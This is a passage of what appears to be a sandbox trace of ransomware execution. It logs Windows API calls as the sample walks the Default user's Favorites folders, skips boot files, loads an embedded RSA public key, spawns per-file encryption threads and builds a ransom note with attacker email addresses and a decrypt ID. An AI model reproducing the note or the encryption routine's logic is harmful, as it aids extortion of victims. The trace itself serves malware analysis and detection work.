returned="C:\\Users\\Default\\Favorites\\Links\\" [0259.622] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*.*") returned="C:\\Users\\Default\\Favorites\\Links\\*.*" [0259.622] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0259.622] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Links") returned="Links" [0259.622] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0259.622] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.622] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0259.622] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0259.622] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0259.622] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0259.622] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0259.622] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0259.622] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned 37 [0259.622] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.622] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0259.622] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0259.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1510 [0259.623] Sleep (dwMilliseconds=0x96) [0259.776] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0259.776] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="..") returned 1 [0259.776] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2=".") returned 1 [0259.777] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.777] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntldr") returned 0x0 [0259.777] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTLDR") returned 0x0 [0259.777] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0259.777] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0259.777] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0259.777] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0259.777] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned 37 [0259.777] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.777] lstrcpyW (in: lpString1=0x17be7c, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0259.777] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0259.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1514 [0259.777] Sleep (dwMilliseconds=0x96) [0259.932] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0259.933] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0259.933] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0259.933] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0259.933] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*.*") returned="C:\\Users\\Default\\Favorites\\Links\\*.*" [0259.933] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0259.933] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0259.933] SetErrorMode (uMode=0x1) returned 0x1 [0259.933] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 54 [0259.933] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0259.933] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.933] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1518) returned 0x0 [0259.933] RegQueryValueExW (in: hKey=0x1518, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e5740, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43e5740*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0259.933] RegCloseKey (hKey=0x1518) returned 0x0 [0259.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.933] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.933] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.933] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.934] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0259.934] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Links") returned="Links" [0259.934] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0259.934] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0259.934] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0259.934] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0259.934] SetErrorMode (uMode=0x1) returned 0x1 [0259.934] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0259.934] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0259.934] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0259.934] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0259.934] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0259.934] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0259.934] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0259.935] StrStrW (lpFirst="IE Add-on site.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0259.935] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntldr") returned 0x0 [0259.935] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTLDR") returned 0x0 [0259.935] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTDETECT.COM") returned 0x0 [0259.935] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntdetect.com") returned 0x0 [0259.935] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0259.935] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0259.935] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0259.935] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0259.935] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0259.935] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0259.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1520 [0259.935] Sleep (dwMilliseconds=0x96) [0260.088] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0260.088] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="..") returned 1 [0260.088] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2=".") returned 1 [0260.088] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0260.089] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntldr") returned 0x0 [0260.089] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTLDR") returned 0x0 [0260.089] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTDETECT.COM") returned 0x0 [0260.089] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntdetect.com") returned 0x0 [0260.089] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0260.089] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.089] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0260.089] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.089] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0260.089] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1524 [0260.089] Sleep (dwMilliseconds=0x96) [0260.245] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0260.245] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="..") returned 1 [0260.245] lstrcmpW (lpString1="Microsoft At Home.url", lpString2=".") returned 1 [0260.245] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0260.245] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntldr") returned 0x0 [0260.245] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTLDR") returned 0x0 [0260.245] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTDETECT.COM") returned 0x0 [0260.245] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntdetect.com") returned 0x0 [0260.245] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0260.245] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.245] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0260.245] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.245] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0260.245] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1528 [0260.245] Sleep (dwMilliseconds=0x96) [0260.400] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0260.400] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="..") returned 1 [0260.401] lstrcmpW (lpString1="Microsoft At Work.url", lpString2=".") returned 1 [0260.401] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0260.401] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntldr") returned 0x0 [0260.401] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTLDR") returned 0x0 [0260.401] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTDETECT.COM") returned 0x0 [0260.401] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntdetect.com") returned 0x0 [0260.401] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0260.401] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.401] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0260.401] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0260.401] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0260.401] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0260.401] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x152c [0260.401] Sleep (dwMilliseconds=0x96) [0260.556] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0260.556] lstrcmpW (lpString1="Microsoft Store.url", lpString2="..") returned 1 [0260.557] lstrcmpW (lpString1="Microsoft Store.url", lpString2=".") returned 1 [0260.557] StrStrW (lpFirst="Microsoft Store.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0260.557] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntldr") returned 0x0 [0260.557] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTLDR") returned 0x0 [0260.557] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTDETECT.COM") returned 0x0 [0260.557] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntdetect.com") returned 0x0 [0260.557] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="Desktop") returned 0x0 [0260.557] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpSrch="DESKTOP") returned 0x0 [0260.557] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0260.557] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 